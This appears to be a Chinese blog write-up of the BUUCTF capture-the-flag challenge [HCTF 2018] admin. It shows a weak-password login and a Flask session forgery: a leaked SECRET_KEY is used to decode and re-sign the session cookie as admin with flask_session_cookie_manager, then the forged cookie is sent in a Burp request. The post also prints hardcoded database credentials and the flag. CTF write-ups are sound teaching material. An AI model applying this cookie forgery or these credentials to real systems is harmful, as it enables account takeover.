BUUCTF WEB [HCTF 2018]admin

于 2022-04-17 17:26:37 发布
阅读量827 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124232880
版权

BUUCTF WEB [HCTF 2018]admin

解法1

弱口令登录

admin
123

得到flag

flag{195df147-fa34-4359-b475-94f71265d085}

解法2

F12查看网页源代码,在change页面发现一段注释

<!-- https://github.com/woadsl1234/hctf_flask/ -->

下载源代码分析,改网站由flask模板搭建,尝试SSTI模板注入。

  • 查看路由信息

    routes.py

    @app.route('/')
@app.route('/index')
def index():
    return render_template('index.html', title = 'hctf')

    index.html

    {% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>

{% include('footer.html') %}

    index.html中存在一个注入点

    Hello {{ session['name'] }}

  • 尝试伪造session,首先使用flask_session_cookie_manager将现在的session解密

    python3 flask_session_cookie_manager3.py decode -c ".eJw9kMGKgzAURX9leGsXmnY2hS5mSCeM8BIM0ZBsSsemamw6oJZaS_99xIEu7urA4d77gP2pc30Nm6G7ugj2zRE2D3j7gQ0gyyecZC1oHSzNVkjk2YSiRrq7WVqcOS3fecjuXONovUkEzWNkuEZmYuOrldC8EXqXGLJ4vJk-JvQZ4UG2SPLRqNlFvjwn3zH3tkW9G1EdA9IsQZK2NsyMmRVn2VowG7gyhHsZhCoTy3CyAQmqNKAyW3hGUPbdaT_8tu7ymmB1URsi58r5aHXaCFbMmSsS2Qj1ebbajMjSmk-y4T6_W1ol_LZddE04VO5lKvPBuOqfXA5hBjC4foAIrr3rltsgieH5B_EYa-E.YlvM9w.qndN8qh-krjrQ-rlSxvdMc6AFNY"

    得到

    b'{"_fresh":true,"_id":{" b":"MGUzMzRhODhmZDQ3M2RlYmVhMDEwZDVlNDc5NmQyNWMxZjY1ODU0MGM4MGY0Yjg3OWNiOWE1Y2UzMzRjYzAzMjQ2NmRkM2UxYTVhM2FjN2I0NjZkMWExMTdmMDQ1M2JkZmFjNGY3NGQ4OGZmNTY2NjRmOTc1ZGMzZmM2MTJmMTY="},"csrf_token":{" b":"ZWVhY2RhMDUxZWJiOGViOGM4M2RiOTBlZWYxMGJhNzRiNjUyZDg1Nw=="},"image":{" b":"cUtYeg=="},"name":"test","user_id":"10"}'

    然后将name的值修改为admin

    b'{"_fresh":true,"_id":{" b":"MGUzMzRhODhmZDQ3M2RlYmVhMDEwZDVlNDc5NmQyNWMxZjY1ODU0MGM4MGY0Yjg3OWNiOWE1Y2UzMzRjYzAzMjQ2NmRkM2UxYTVhM2FjN2I0NjZkMWExMTdmMDQ1M2JkZmFjNGY3NGQ4OGZmNTY2NjRmOTc1ZGMzZmM2MTJmMTY="},"csrf_token":{" b":"ZWVhY2RhMDUxZWJiOGViOGM4M2RiOTBlZWYxMGJhNzRiNjUyZDg1Nw=="},"image":{" b":"cUtYeg=="},"name":"admin","user_id":"10"}'

    config.py中找到加密所要使用的盐

    import os

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

    加密

    python3 flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh':True,'_id': b'0e334a88fd473debea010d5e4796d25c1f658540c80f4b879cb9a5ce334cc032466dd3e1a5a3ac7b466d1a117f0453bdfac4f74d88ff56664f975dc3fc612f16','csrf_token': b'eeacda051ebb8eb8c83db90eef10ba74b652d857','image': b'qKXz','name':'admin','user_id':'10'}"

    .eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo

  • 使用burp修改session发包

    GET /index HTTP/1.1
Host: 68d7742b-0d5a-43d5-b7e4-5dde4d30cca4.node4.buuoj.cn:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://68d7742b-0d5a-43d5-b7e4-5dde4d30cca4.node4.buuoj.cn:81/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=.eJw9kMGKwjAURX9leGsXbXQ2gosZ4oQpvISGtCHZiFNrm9TnQFWsFf99igMu7urA4d57h82-r08tLM_9pZ7BJuxgeYe3H1gCimLEUbeKt-R5PkemD47KFvn66nl5kLx6l5TfpMXBR5cqXiQocIHCJS42c2VlUHadOvb0RDd-jBhzJkl3yIrBmcnFvqJk34mMvkO7HtDsCHmeIss6TxMTbi5FvlDCkzSOyahJmSr1AkdPyNBkhMat4DGD6tTvN-ffrj6-Jnhbto7pqXIxeJsFJcopU0WmgzKfB2_dgCJr5aiDjMXN8yaV19VTF2jb1C9TVZxd3fyT45YmANsdhSPM4HKq--dvkCbw-ANc62wq.Ylvb5g.DUA8zwAHnnZJtKcOEoC84MxbRQo
Connection: close

  • 得到flag

    flag{195df147-fa34-4359-b475-94f71265d085}
Y1Daa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值